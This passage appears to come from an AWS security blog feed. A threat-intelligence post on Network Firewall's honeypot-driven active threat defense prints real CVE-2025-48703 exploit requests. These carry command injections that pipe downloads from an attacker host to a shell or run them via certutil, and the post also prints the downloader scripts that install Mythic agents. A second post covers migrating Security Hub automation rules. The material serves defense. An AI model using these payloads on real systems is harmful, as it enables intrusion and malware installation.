After the threat actor identifies a vulnerable target, they exploit the vulnerability to deliver malware that will establish persistent access. The following table lists 20 vulnerabilities that threat actors tried to exploit against MadPot to deliver malware over the past 90 days:

CVE ID Vulnerability name
CVE-2017-12149 JBoss Application Server remote code execution (RCE)
CVE-2020-7961 Liferay Portal RCE
CVE-2021-26084 Confluence Server and Data Center RCE
CVE-2021-41773 Apache HTTP server path traversal and RCE
CVE-2021-44228 Apache Log4j2 RCE
CVE-2022-22954 VMware Workspace ONE access and identity manager RCE
CVE-2022-26134 Atlassian Confluence Server and Data Center RCE
CVE-2022-44877 Control Web Panel or CentOS Web Panel RCE
CVE-2023-22527 Confluence Data Center and Server RCE
CVE-2023-43208 NextGen Healthcare Mirth Connect RCE
CVE-2023-46604 Java OpenWire protocol marshaller RCE
CVE-2024-23692 Rejetto HTTP file server RCE
CVE-2024-24919 Check Point security gateways RCE
CVE-2024-36401 GeoServer RCE
CVE-2024-51567 CyberPanel RCE
CVE-2025-20281 Cisco ISE and Cisco ISE-PIC RCE
CVE-2025-20337 Cisco ISE and Cisco ISE-PIC RCE
CVE-2025-24016 Wazuh RCE
CVE-2025-47812 Wing FTP RCE
CVE-2025-48703 CyberPanel RCE

Step 5: Malware download

The compromised target attempts to download the malware payload from the threat actor's distribution server, but active threat defense intervenes again. The malware hosting infrastructure (whether a domain, URL, or IP address) has been identified by MadPot and blocked by Network Firewall. If malware is delivered through TLS endpoints, active threat defense rules inspect the Server Name Indication (SNI) during the TLS handshake to identify and block malicious domains without decrypting traffic. For malware not delivered over TLS, or for customers who have enabled the Network Firewall TLS inspection feature, active threat defense rules inspect full URLs and HTTP headers, applying content-based rules before re-encrypting and forwarding legitimate traffic. Without successful malware delivery and execution, the threat actor cannot establish control.

Step 6: Command and control connection

If malware had somehow been delivered, it would attempt to phone home by connecting to the threat actor's C2 server to receive instructions. At this point, another active threat defense layer activates. In Network Firewall, active threat defense implements mechanisms across multiple protocol layers to identify and block C2 communications before they facilitate sustained malicious operations. At the DNS layer, Network Firewall blocks resolution requests for known-malicious C2 domains, preventing malware from discovering where to connect. At the TCP layer, Network Firewall blocks direct connections to C2 IP addresses and ports. At the TLS layer, as described in Step 5, Network Firewall uses SNI inspection and fingerprinting techniques (or full decryption when enabled) to identify encrypted C2 traffic. Network Firewall blocks the outbound connection to the known-malicious C2 infrastructure, severing the threat actor's ability to control the infected workload. Even if malware is present on the compromised workload, it's effectively neutralized: isolated and unable to communicate with its operator. Similarly, threat detection findings are created in Amazon GuardDuty for attempts to connect to the C2, so you can initiate incident response workflows. The following table lists examples of C2 frameworks that MadPot and our internet-wide scans have observed over the past 90 days:

Command and control frameworks
Adaptix, AsyncRAT, Brute Ratel, Cobalt Strike, Covenant, Deimos, Empire, Havoc, Metasploit, Mirai, Mythic, Platypus, Quasar, Sliver, SparkRAT, XorDDoS

Step 7: Attack objectives blocked

Without C2 connectivity, the threat actor cannot steal data or exfiltrate credentials. The layered approach used by active threat defense means threat actors must succeed at every step, while you only need to block one stage to stop the activity. This defense-in-depth approach reduces risk even if some defense layers have vulnerabilities. You can track active threat defense actions in the Network Firewall alert log.
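Network Firewall alert logs carry a Suricata EVE-style JSON record under an event field, so blocked connections can be surfaced with a small log scan. A minimal sketch follows; the record is synthetic, and field names should be verified against your own alert log output.

```python
import json

# Synthetic Network Firewall alert log record. Alert logs wrap a Suricata
# EVE-style record under "event"; verify field names against real output.
sample = json.dumps({
    "firewall_name": "example-firewall",
    "event_timestamp": "1730000000",
    "event": {
        "event_type": "alert",
        "src_ip": "10.0.1.25",
        "dest_ip": "196.251.116.232",
        "dest_port": 28571,
        "alert": {"action": "blocked", "signature": "deny HTTP host vc2.b1ack.cat"},
    },
})

def blocked_connections(log_lines):
    """Return (dest_ip, signature) for every blocked alert event."""
    hits = []
    for line in log_lines:
        event = json.loads(line).get("event", {})
        alert = event.get("alert", {})
        if event.get("event_type") == "alert" and alert.get("action") == "blocked":
            hits.append((event.get("dest_ip"), alert.get("signature")))
    return hits

hits = blocked_connections([sample])
```

In practice you would point a scan like this at the log destination you configured for the firewall (for example, an S3 bucket or CloudWatch Logs group) rather than an in-memory sample.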

Real attack scenario: Stopping a CVE-2025-48703 exploitation campaign

In October 2025, AWS MadPot honeypots began detecting an attack campaign targeting Control Web Panel (CWP), a server management platform used by hosting providers and system administrators. The threat actor was attempting to exploit CVE-2025-48703, a remote code execution vulnerability in CWP, to deploy the Mythic C2 framework. While Mythic is an open source command and control platform originally designed for legitimate red team operations, threat actors also adopt it for malicious campaigns. The exploit attempts originated from IP address 61.244.94[.]126, which exhibited characteristics consistent with a VPN exit node.

To confirm vulnerable targets, the threat actor attempted to execute operating system commands by exploiting the CWP file manager vulnerability. MadPot honeypots received exploitation attempts like the following example using the whoami command:

POST /nginx/index.php?module=filemanager&acc=changePerm HTTP/1.1
host: xx.xxx.xxx.xxx:49153
content-type: multipart/form-data; boundary=----WebKitFormBoundaryrTrcHpS9ovyhBLtb
content-length: 455

------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="fileName"

.bashrc
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="currentPath"

/home/nginx
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="recursive"

------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="t_total"

whoami /priv
------WebKitFormBoundaryrTrcHpS9ovyhBLtb--

While this specific campaign didn't use OAST callbacks for vulnerability confirmation, MadPot observes similar CVE-2025-48703 exploitation attempts using OAST callbacks, like the following example:

POST /debian/index.php?module=filemanager&acc=changePerm HTTP/1.1
host: xx.xxx.xxx.xxx:8085
user-agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
content-length: 503
content-type: multipart/form-data; boundary=z7twpejkzthnvgn9fcrtjpxgnrw08sxxjwwdkhy5
accept-encoding: gzip
connection: close

--z7twpejkzthnvgn9fcrtjpxgnrw08sxxjwwdkhy5
Content-Disposition: form-data; name="fileName"

.bashrc
--z7twpejkzthnvgn9fcrtjpxgnrw08sxxjwwdkhy5
Content-Disposition: form-data; name="currentPath"

/home/debian
--z7twpejkzthnvgn9fcrtjpxgnrw08sxxjwwdkhy5
Content-Disposition: form-data; name="recursive"

--z7twpejkzthnvgn9fcrtjpxgnrw08sxxjwwdkhy5
Content-Disposition: form-data; name="t_total"

ping d4c81ab7l0phir01tus0888p1xozqw1bs.oast[.]fun
--z7twpejkzthnvgn9fcrtjpxgnrw08sxxjwwdkhy5--

After the vulnerable systems were identified, the attack moved immediately to payload delivery. MadPot captured infection attempts targeting both Linux and Windows workloads. For Linux targets, the threat actor used curl and wget to download the malware:

POST /cwp/index.php?module=filemanager&acc=changePerm HTTP/1.1
host: xx.xxx.xxx.xxx:5704
content-type: multipart/form-data; boundary=----WebKitFormBoundaryrTrcHpS9ovyhBLtb
content-length: 539

------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="fileName"

.bashrc
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="currentPath"

/home/cwp
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="recursive"

------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="t_total"

(curl -fsSL -m180 hxxp://vc2.b1ack[.]cat:28571/slt||wget -T180 -q hxxp://vc2.b1ack[.]cat:28571/slt)|sh
------WebKitFormBoundaryrTrcHpS9ovyhBLtb--

For Windows systems, the threat actor used Microsoft's certutil.exe utility to download the malware:

POST /panel/index.php?module=filemanager&acc=changePerm HTTP/1.1
host: xx.xxx.xxx.xxx:49153
content-type: multipart/form-data; boundary=----WebKitFormBoundaryrTrcHpS9ovyhBLtb
content-length: 557

------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="fileName"

.bashrc
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="currentPath"

/home/panel
------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="recursive"

------WebKitFormBoundaryrTrcHpS9ovyhBLtb
Content-Disposition: form-data; name="t_total"

certutil.exe -urlcache -split -f hxxp://vc2.b1ack[.]cat:28571/swt C:\Users\Public\run.bat && C:\Users\Public\run.bat
------WebKitFormBoundaryrTrcHpS9ovyhBLtb--

When MadPot honeypots observe these exploitation attempts, they download the malicious payloads just as vulnerable servers would. MadPot uses these observations to extract threat indicators at multiple layers of analysis.

Layer 1: MadPot identified the staging URLs and underlying IP addresses hosting the malware:

hxxp://vc2.b1ack[.]cat:28571/slt (Linux script, SHA256: bdf17b3047a9c9de24483cce55279e62a268c01c2aba6ddadee42518a9ccddfc)
hxxp://196.251.116[.]232:28571/slt
hxxp://vc2.b1ack[.]cat:28571/swt (Windows script, SHA256: 6ec153a14ec3a2f38edd0ac411bd035d00668a860ee0140e087bb4083610f7cf)
hxxp://196.251.116[.]232:28571/swt

Layer 2: MadPot's analysis of the malware revealed that the Windows batch file (SHA256: 6ec153a1...) contained logic to detect system architecture and download the appropriate Mythic agent:

@echo off
setlocal enabledelayedexpansion

set u64="hxxp://196.251.116[.]232:28571/?h=196.251.116[.]232&p=28571&t=tcp&a=w64&stage=true"
set u32="hxxp://196.251.116[.]232:28571/?h=196.251.116[.]232&p=28571&t=tcp&a=w32&stage=true"
set v="C:\Users\Public\350b0949tcp.exe"
del %v%
for /f "tokens=*" %%A in ('wmic os get osarchitecture ^| findstr 64') do (
    set "ARCH=64"
)
if "%ARCH%"=="64" (
    certutil.exe -urlcache -split -f %u64% %v%
) else (
    certutil.exe -urlcache -split -f %u32% %v%
)

start "" %v%
exit /b 0

The Linux script (SHA256: bdf17b30...) supported x86_64, i386, i686, aarch64, and armv7l architectures:

export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin

l64="196.251.116[.]232:28571/?h=196.251.116[.]232&p=28571&t=tcp&a=l64&stage=true"
l32="196.251.116[.]232:28571/?h=196.251.116[.]232&p=28571&t=tcp&a=l32&stage=true"
a64="196.251.116[.]232:28571/?h=196.251.116[.]232&p=28571&t=tcp&a=a64&stage=true"
a32="196.251.116[.]232:28571/?h=196.251.116[.]232&p=28571&t=tcp&a=a32&stage=true"

v="43b6f642tcp"
rm -rf $v

ARCH=$(uname -m)
if [ ${ARCH}x = "x86_64x" ]; then
    (curl -fsSL -m180 $l64 -o $v||wget -T180 -q $l64 -O $v||python -c 'import urllib;urllib.urlretrieve("http://'$l64'", "'$v'")')
elif [ ${ARCH}x = "i386x" ]; then
    (curl -fsSL -m180 $l32 -o $v||wget -T180 -q $l32 -O $v||python -c 'import urllib;urllib.urlretrieve("http://'$l32'", "'$v'")')
# [additional architecture checks]
fi

chmod +x $v
(nohup $(pwd)/$v > /dev/null 2>&1 &) || (nohup ./$v > /dev/null 2>&1 &)

Layer 3: By analyzing these staging scripts and referenced infrastructure, MadPot identified additional threat indicators revealing Mythic C2 framework endpoints:

Health check endpoint 196.251.116[.]232:7443 and vc2.b1ack[.]cat:7443
HTTP listener 196.251.116[.]232:80 and vc2.b1ack[.]cat:80

Within 30 minutes of MadPot's analysis, Network Firewall instances globally deployed protection rules targeting every layer of this attack infrastructure. Vulnerable CWP installations remained protected against this campaign: when the exploit tried to execute curl -fsSL -m180 hxxp://vc2.b1ack[.]cat:28571/slt or certutil.exe -urlcache -split -f hxxp://vc2.b1ack[.]cat:28571/swt, Network Firewall would have blocked both resolution of the vc2.b1ack[.]cat domain and connections to 196.251.116[.]232:28571 for as long as the infrastructure was active. The vulnerable application might have executed the exploit payload, but Network Firewall blocked the malware download at the network layer.

Even if the staging scripts somehow reached a target through alternate means, they would fail when attempting to download Mythic agent binaries. The architecture-specific URLs would have been blocked. If a Mythic agent binary was somehow delivered and executed through a completely different infection vector, it still could not establish command-and-control. When the malware attempted to connect to the Mythic framework’s health endpoint on port 7443 or the HTTP listener on port 80, Network Firewall would have terminated those connections at the network perimeter.

This scenario shows how the active threat defense intelligence pipeline disrupts different stages of threat activities. This is the Swiss cheese model in practice: even when one defensive layer (for example, OAST callback blocking) isn't applicable, subsequent layers (blocking malware-hosting URLs, malware network behavior, and identified botnet infrastructure) provide overlapping protection. MadPot analysis of the attack reveals additional threat indicators at each layer that protect customers at different stages of the attack chain.

For GuardDuty customers with unpatched CWP installations, this meant they would have received threat detection findings for communication attempts involving threat indicators tracked by active threat defense. For Network Firewall customers using active threat defense, unpatched CWP workloads would have been automatically protected against this campaign even before this CVE was added to the CISA Known Exploited Vulnerabilities (KEV) catalog on November 4.

Conclusion

AWS active threat defense for Network Firewall uses MadPot intelligence and multi-layered protection to disrupt attacker kill chains and reduce the operational burden for security teams. With automated rule deployment, active threat defense creates multi-layered defenses within 30 minutes of new threats being detected by MadPot. Amazon GuardDuty customers automatically receive threat detection findings when workloads attempt to communicate with malicious infrastructure identified by active threat defense, while AWS Network Firewall customers can actively block these threats using the active threat defense managed rule group. To get started, see Improve your security posture using Amazon threat intelligence on AWS Network Firewall.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Rahi Patel
Rahi is a Startups Technical Account Manager at AWS specializing in Networking. He architects cloud networking solutions optimizing performance across global AWS deployments. Previously a network engineer with Cisco Meraki, he holds an MS in Engineering from San Jose State University. Outside work, he enjoys tennis and pickleball.
Paul Bodmer
Paul is a Security Engineering Manager at AWS, leading the Perimeter Protection Threat Research Team. He is responsible for the strategic direction of how AWS uses deception technology to produce actionable threat intelligence for AWS internal and external security services.
Nima Sharifi Mehr
Nima is a Principal Security Engineer at AWS, overseeing the technical direction of the Perimeter Protection Threat Research Team. He created MadPot, now a pillar of the Amazon cybersecurity strategy, used by teams across the company to protect customers and partners while raising global cybersecurity standards.
Maxim Raya
Maxim is a Security Specialist Solutions Architect at AWS. In this role, he helps clients accelerate their cloud transformation by increasing their confidence in the security and compliance of their AWS environments.
Santosh Shanbhag
Santosh is a seasoned product leader, specializing in security, data protection, and compliance. At AWS, he focuses on securing workloads through Network and Application Security services, including AWS Network Firewall and active threat defense.

Security Hub CSPM automation rule migration to Security Hub

17 December 2025 at 22:06

A new version of AWS Security Hub is now generally available with new capabilities to aggregate, correlate, and contextualize your security alerts across Amazon Web Services (AWS) accounts. The prior version is now known as AWS Security Hub CSPM and will continue to be available as a unique service focused on cloud security posture management and finding aggregation.

One capability available in both services is automation rules. In both Security Hub and Security Hub CSPM, you can use automation rules to automatically update finding fields when the criteria they define are met. In Security Hub, automation rules can also be used to send findings to third-party platforms for operational response. Many existing Security Hub CSPM users have automation rules for tasks such as elevating the severity of a finding because it affects a production resource, or adding a comment to assist in remediation workflows. While both services offer similar automation rule functionality, rules aren't synchronized across the two services. If you are an existing Security Hub CSPM customer looking to adopt the new Security Hub, you might want to migrate the automation rules you have already built; this keeps automation rule processing close to where you review findings. As of publication, this capability is included in the cost of the Security Hub essentials plan. For current pricing details, refer to the Security Hub pricing page.

This post provides a solution to automatically migrate automation rules from Security Hub CSPM to Security Hub, helping you maintain your security automation workflows while taking advantage of the new Security Hub features. If you aren't currently using automation rules and want to get started, see Automation rules in Security Hub.

Automation rule migration challenge

Security Hub CSPM uses the AWS Security Finding Format (ASFF) as the schema for its findings. This schema is fundamental to how automation rules are applied to findings as they are generated. Automation rules begin by defining one or more criteria and then selecting one or more actions that will be applied when the specified criteria are met. Each criterion specifies an ASFF field, an operator (such as equals or contains), and a value. Actions then update one or more ASFF fields.
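For example, a CSPM rule that raises the severity of findings on production resources pairs ASFF criteria with a finding-fields-update action. The sketch below builds such a request in the shape accepted by the CreateAutomationRule API of the boto3 securityhub client; the rule name, tag key, and note text are hypothetical.

```python
# Sketch of a Security Hub CSPM automation rule request (CreateAutomationRule
# API shape). The rule name, tag key, and note text are hypothetical examples.
rule = {
    "RuleName": "elevate-prod-severity",  # hypothetical name
    "RuleOrder": 1,
    "Description": "Raise severity for findings on production resources",
    "Criteria": {
        # Each criterion names an ASFF field, a comparison operator, and a value.
        "ResourceTags": [{"Key": "env", "Value": "prod", "Comparison": "EQUALS"}],
        "SeverityLabel": [{"Value": "HIGH", "Comparison": "EQUALS"}],
    },
    "Actions": [
        {
            "Type": "FINDING_FIELDS_UPDATE",
            "FindingFieldsUpdate": {
                # Each action updates one or more ASFF fields.
                "Severity": {"Label": "CRITICAL"},
                "Note": {"Text": "Production resource, escalate", "UpdatedBy": "automation"},
            },
        }
    ],
}

# With boto3, this dict is passed as keyword arguments:
#   boto3.client("securityhub").create_automation_rule(**rule)
```

It is rules of exactly this shape that the migration solution discovers and transforms into the OCSF schema.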

The new version of Security Hub uses the Open Cybersecurity Schema Framework (OCSF), a widely adopted open-source schema supported by AWS and partners in the cybersecurity industry. Security Hub automation rules structurally work the same way as Security Hub CSPM rules. However, the underlying schema change means existing automation rules require transformation.

The solution provided in this post automatically discovers Security Hub CSPM automation rules, transforms them into the OCSF schema, and creates an AWS CloudFormation template that you can use to deploy them to your AWS account running the new version of Security Hub. Because of inherent differences between the ASFF and OCSF schemas, some rules can't be automatically migrated, while others might require manual review after migration.

The following table shows the current mapping between ASFF fields supported as criteria and their corresponding OCSF fields. These mappings may change in future service releases. Fields marked as N/A can't be migrated and require special consideration: rules that use them need to be redesigned in the new Security Hub. The solution provided in this post is designed to skip migration of rules with one or more ASFF criteria that don't map to an OCSF field, but it identifies those rules in a report for your review.

Rule criterion in ASFF            Corresponding OCSF field
AwsAccountId                      cloud.account.uid
AwsAccountName                    cloud.account.name
CompanyName                       metadata.product.vendor_name
ComplianceAssociatedStandardsId   compliance.standards
ComplianceSecurityControlId       compliance.control
ComplianceStatus                  compliance.status
Confidence                        confidence_score
CreatedAt                         finding_info.created_time
Criticality                       N/A
Description                       finding_info.desc
FirstObservedAt                   finding_info.first_seen_time
GeneratorId                       N/A
Id                                finding_info.uid
LastObservedAt                    finding_info.last_seen_time
NoteText                          comment
NoteUpdatedAt                     N/A
NoteUpdatedBy                     N/A
ProductArn                        metadata.product.uid
ProductName                       metadata.product.name
RecordState                       activity_name
RelatedFindingsId                 N/A
RelatedFindingsProductArn         N/A
ResourceApplicationArn            N/A
ResourceApplicationName           N/A
ResourceDetailsOther              N/A
ResourceId                        resources[x].uid
ResourcePartition                 resources[x].cloud_partition
ResourceRegion                    resources[x].region
ResourceTags                      resources[x].tags
ResourceType                      resources[x].type
SeverityLabel                     vendor_attributes.severity
SourceUrl                         finding_info.src_url
Title                             finding_info.title
Type                              finding_info.types
UpdatedAt                         finding_info.modified_time
UserDefinedFields                 N/A
VerificationState                 N/A
WorkflowStatus                    status
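As a concrete illustration of the skip logic described above, the mapping table and the migratability check can be sketched in Python. The dictionary is abridged and its shape is hypothetical; the actual solution's data structures may differ.

```python
# Abridged sketch of the ASFF-to-OCSF criteria mapping from the table above.
# None marks fields listed as N/A (no OCSF equivalent).
ASFF_TO_OCSF = {
    "AwsAccountId": "cloud.account.uid",
    "ComplianceStatus": "compliance.status",
    "SeverityLabel": "vendor_attributes.severity",
    "WorkflowStatus": "status",
    "Criticality": None,   # N/A: rule must be redesigned in the new Security Hub
    "GeneratorId": None,   # N/A
}

def classify_rule(criteria_fields):
    """Return ('migrate', mapped_fields) if every criterion maps to an OCSF
    field, or ('skip', unmapped_fields) so the rule can be flagged in the
    migration report instead of being transformed."""
    unmapped = [f for f in criteria_fields if ASFF_TO_OCSF.get(f) is None]
    if unmapped:
        return ("skip", unmapped)
    return ("migrate", [ASFF_TO_OCSF[f] for f in criteria_fields])
```

A rule whose criteria all map is transformed; a single unmappable criterion sends the whole rule to the report for manual redesign.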

The following table shows the ASFF fields that are supported as actions and their corresponding OCSF fields. Note that several action fields aren’t available in OCSF:

Rule action fields in ASFF   Corresponding OCSF field
Confidence                   N/A
Criticality                  N/A
Note                         comment
RelatedFindings              N/A
Severity                     severity
Types                        N/A
UserDefinedFields            N/A
VerificationState            N/A
Workflow Status              status

For Security Hub CSPM automation rules that include actions without OCSF equivalents, the solution is designed to migrate the rules but include only the supported actions. These rules will be designated as partially migrated in the rule description and the migration report. You can use this information to review and modify the rules before enabling them, helping to ensure that the new automation rules behave as expected.
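The partial-migration behavior for actions can be sketched the same way. The action names follow the table above; the rule and action structures below are hypothetical, not the solution's actual internals.

```python
# Sketch of partial action migration: keep actions with OCSF equivalents,
# drop the rest, and report what was dropped. Mapping per the table above.
SUPPORTED_ACTIONS = {
    "Note": "comment",
    "Severity": "severity",
    "Workflow Status": "status",
}

def migrate_actions(actions):
    """Return (migrated, dropped, partial). `partial` is True when the rule
    can be migrated but lost at least one unsupported action, so it should
    be flagged in the rule description and migration report."""
    migrated = {SUPPORTED_ACTIONS[k]: v for k, v in actions.items()
                if k in SUPPORTED_ACTIONS}
    dropped = sorted(k for k in actions if k not in SUPPORTED_ACTIONS)
    partial = bool(dropped) and bool(migrated)
    return migrated, dropped, partial
```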

Solution overview

This solution provides a set of Python scripts designed to assist with the migration of automation rules from Security Hub CSPM to the new Security Hub. Here’s how the migration process works:

  1. Begin migration: The solution provides an orchestration script that runs three sub-scripts and passes the required inputs to each.
  2. Discovery: The solution scans your Security Hub CSPM environment to identify and collect existing automation rules across specified AWS Regions.
  3. Analysis: Each rule is evaluated to determine if it can be fully migrated, partially migrated, or requires manual intervention based on ASFF to OCSF field mapping compatibility.
  4. Transformation: Compatible rules are automatically converted from the ASFF schema to the OCSF schema using predefined field mappings.
  5. Template creation: The solution generates a CloudFormation template containing the transformed rules, maintaining their original order and Regional context.
  6. Deployment: Review the generated template and deploy it to create the migrated rules in Security Hub, where they are created in a disabled state by default.
  7. Validate and enable rules: Review each migrated rule in the AWS Management Console for Security Hub to verify its criteria, actions, and preview your current matching findings if applicable. After confirming that the rules work as intended individually and as a sequence, enable them to resume your automation workflows.
Figure 1: Architecture diagram showing scripts and how they interact with AWS

The solution, shown in Figure 1, consists of four Python scripts that work together to migrate your automation rules:

  1. Orchestrator: Coordinates discovery, transformation, and generation along with reporting and logging
  2. Rule discovery: Identifies and extracts existing automation rules from Security Hub CSPM across the Regions you specify
  3. Schema transformation: Converts the rules from ASFF to OCSF format using the field mapping detailed earlier
  4. Template generation: Creates CloudFormation templates that you can use to deploy the migrated rules

The scripts use credentials configured using the AWS Command Line Interface (AWS CLI) to discover existing Security Hub automation rules. For details on how to configure credentials using AWS CLI, see Setting up the AWS CLI.
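The discovery step amounts to paging through the Security Hub ListAutomationRules API. A minimal sketch, assuming a boto3-style client (the response key AutomationRulesMetadata and NextToken pagination follow the boto3 Security Hub documentation); passing the client in lets you exercise the function with a stub instead of live credentials:

```python
def discover_rules(securityhub):
    """Collect all Security Hub CSPM automation rule metadata, following
    NextToken pagination. `securityhub` can be a boto3 Security Hub client
    (boto3.client("securityhub")) or any object with the same method."""
    rules, token = [], None
    while True:
        kwargs = {"NextToken": token} if token else {}
        page = securityhub.list_automation_rules(**kwargs)
        rules.extend(page.get("AutomationRulesMetadata", []))
        token = page.get("NextToken")
        if not token:
            return rules
```

The real scripts would then call BatchGetAutomationRules on the collected ARNs to retrieve the full criteria and actions for transformation.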

Prerequisites

Before running the solution, ensure you have the following components and permissions in place:

  • Required software:
    • AWS CLI (latest version)
    • Python 3.12 or later
    • Python packages:
      • boto3 (latest version)
      • pyyaml (latest version)
  • Required permissions:
    For rule discovery and transformation:

    • securityhub:ListAutomationRules
    • securityhub:BatchGetAutomationRules
    • securityhub:GetFindingAggregator
    • securityhub:DescribeHub
    • securityhub:ListAutomationRulesV2

    For template deployment:

    • cloudformation:CreateStack
    • cloudformation:UpdateStack
    • cloudformation:DescribeStacks
    • cloudformation:CreateChangeSet
    • cloudformation:DescribeChangeSet
    • cloudformation:ExecuteChangeSet
    • cloudformation:GetTemplateSummary
    • securityhub:CreateAutomationRuleV2
    • securityhub:UpdateAutomationRuleV2
    • securityhub:DeleteAutomationRuleV2
    • securityhub:GetAutomationRuleV2
    • securityhub:TagResource
    • securityhub:ListTagsForResource

AWS account configuration

Security Hub supports a delegated administrator account model when used with AWS Organizations. This delegated administrator account centralizes the management of security findings and service configuration across your organization’s member accounts. Automation rules must be created in the delegated administrator account in the home Region, and in unlinked Regions. Member accounts can’t create their own automation rules.

We recommend using the same account as the delegated administrator for Security Hub CSPM and Security Hub to maintain consistent security management. Configure your AWS CLI with credentials for this delegated administrator account before running the migration solution (see Setting up the AWS CLI for more information).

While this solution is primarily designed for delegated administrator deployments, it also supports single-account Security Hub implementations.

Key migration concepts

Before proceeding with the migration of your automation rules from Security Hub CSPM to Security Hub, it’s important to understand several key concepts that affect how rules are migrated and deployed. These concepts influence the migration process and the resulting behavior of your rules. Understanding them will help you plan your migration strategy and validate the results effectively.

Default rule state

By default, migrated rules are created in a DISABLED state, meaning the actions will not be applied to findings as they are generated. The solution can optionally create rules in an ENABLED state, but this is not recommended. Instead, create the rules in a DISABLED state, review each rule, preview matching findings, and then move the rule to an ENABLED state when ready.

Unsupported fields

The migration report details any rules that can’t be migrated because they include one or more Security Hub CSPM criteria that aren’t supported by the new Security Hub. These cases occur because of the differences between the ASFF and OCSF schemas. These rules require special attention because they can’t be automatically replicated with equivalent behavior. This is particularly important if you have Security Hub CSPM rules that depend on priority order.

When rules have actions that aren’t supported, they will still be migrated if at least one action is supported. Rules with partially supported actions are flagged in the migration report and the new automation rule description and should be reviewed.

Home and linked Regions

Both Security Hub CSPM and Security Hub support a home Region that aggregates findings from linked Regions. However, their automation rules behave differently. Security Hub CSPM automation rules operate on a Regional basis: they affect only findings generated in the Region where they are created, so even if you use a home Region, they do not apply to findings aggregated into the home Region from linked Regions. The new Security Hub supports automation rules defined in the home Region and applied to all linked Regions, and does not support creating automation rules in linked Regions. Unlinked Regions can still have their own automation rules, which affect only the findings generated in that Region, and must have automation rules applied separately.

The solution supports two deployment modes to handle these differences. The first mode, Home Region, should be used for Security Hub deployments with a home Region enabled. This mode identifies Security Hub CSPM automation rules from the specified Regions and recreates them with an additional criterion that accounts for the Region each rule came from. It then generates one CloudFormation template that can be deployed in the home Region. The automation rules still operate as intended because of the added criterion for the original Region where each rule was created.
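A minimal sketch of that Home Region transformation, assuming a hypothetical criteria dictionary and using cloud.region as an illustrative OCSF field name (the actual field the solution keys on may differ):

```python
def add_region_criterion(ocsf_criteria, source_region):
    """Home Region mode sketch: constrain a migrated rule to findings that
    originated in the Region where the CSPM rule was defined. The field
    name "cloud.region" and the criteria shape are illustrative."""
    criteria = dict(ocsf_criteria)  # copy; leave the caller's dict untouched
    criteria["cloud.region"] = [{"Comparison": "EQUALS", "Value": source_region}]
    return criteria
```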

The second mode is called Region-by-Region. This mode is for users who don’t currently use a home Region. In this mode, the solution still discovers automation rules in the Regions specified but generates a unique CloudFormation template for each Region. The resulting templates can then be deployed one by one to the delegated administrator account for their corresponding Region. No additional criteria are added to the automation rule in this mode.

It is possible to use a home Region with Security Hub and link some Regions, but not all. If this is the case, run the Home Region mode for the home Region and all linked Regions. Then, re-run the solution in Region-by-Region mode for all unlinked Regions.

Rule order

Both Security Hub CSPM and Security Hub automation rules have an order in which they are evaluated. This can be important for certain situations where different automation rules might apply to the same findings or take actions on the same fields. This solution preserves the original order of your automation rules.

If there are existing Security Hub automation rules, the solution creates the new automation rules beginning after the existing rules. For example, if you have 3 Security Hub automation rules and are migrating 10 new rules, the solution will assign orders 4 through 13 to the new rules.

When using the Home Region mode, the order of automation rules for each Region is preserved and clustered together in the final order. For example, if a user with three Security Hub automation rules in three different Regions migrates the rules, they will be migrated sequentially. The solution will first migrate all rules from Region 1 in their original order, followed by all rules from Region 2 in their original order, and finally all rules from Region 3 in their original order.
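The ordering behavior described above can be sketched as follows. The data shapes are hypothetical, but the numbering matches the example of 3 existing rules and 10 migrated rules receiving orders 4 through 13, and Home Region mode's per-Region clustering.

```python
def assign_rule_order(existing_count, rules_by_region, region_order):
    """Number migrated rules starting after any existing Security Hub rules,
    preserving each Region's original rule order and clustering Regions
    together (Home Region mode). Returns (order, region, rule) tuples."""
    order, out = existing_count, []
    for region in region_order:
        for rule in rules_by_region.get(region, []):
            order += 1
            out.append((order, region, rule))
    return out
```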

Deploy and validate the migration

Now that you have the prerequisites in place and understand the basic concepts, you’re ready to deploy and validate the migration.

To deploy the migration:

1. Clone the Security Hub automation rules Migration Tool from the AWS samples GitHub repository:

git clone https://github.com/aws-samples/sample-SecurityHub-Automation-Rule-Migration.git

2. Run the scripts following the instructions in the README file, which contains the most up-to-date implementation instructions. This generates a CloudFormation template that creates the new Security Hub automation rules. Deploy the template using the AWS CLI or the console. For more details, see Create a stack from the CloudFormation console or the README file.

When deployment is complete, you can use the Security Hub console to review your migrated automation rules. Remember that rules are created in a DISABLED state by default. Review each rule’s criteria and actions carefully, checking that they match your intended automation workflow. You can also preview what existing findings would have matched each automation rule in the console.

To review and validate migrated rules:

1. Go to the Security Hub console and choose Automations from the navigation pane.

Figure 2: Security Hub Automations page

2. Select a rule and then choose Edit at the top of the page.

Figure 3: Security Hub automation rule details

3. Choose Preview matching findings. It’s possible that no findings will be returned even if the automation rule is behaving as expected. This means only that there are currently no findings matching the rule criteria in Security Hub. In this case, you can still review the rule criteria.

Figure 4: Security Hub Edit automation rule page

4. After validating a rule’s configuration, you can enable it through the console from the rule editing page. You can also update the CloudFormation stack. If you didn’t need to change any criteria or actions of your automation rules, you can re-run the scripts with the optional --create-enabled flag to reproduce the CloudFormation template with all rules enabled and deploy it as an update to the existing stack.

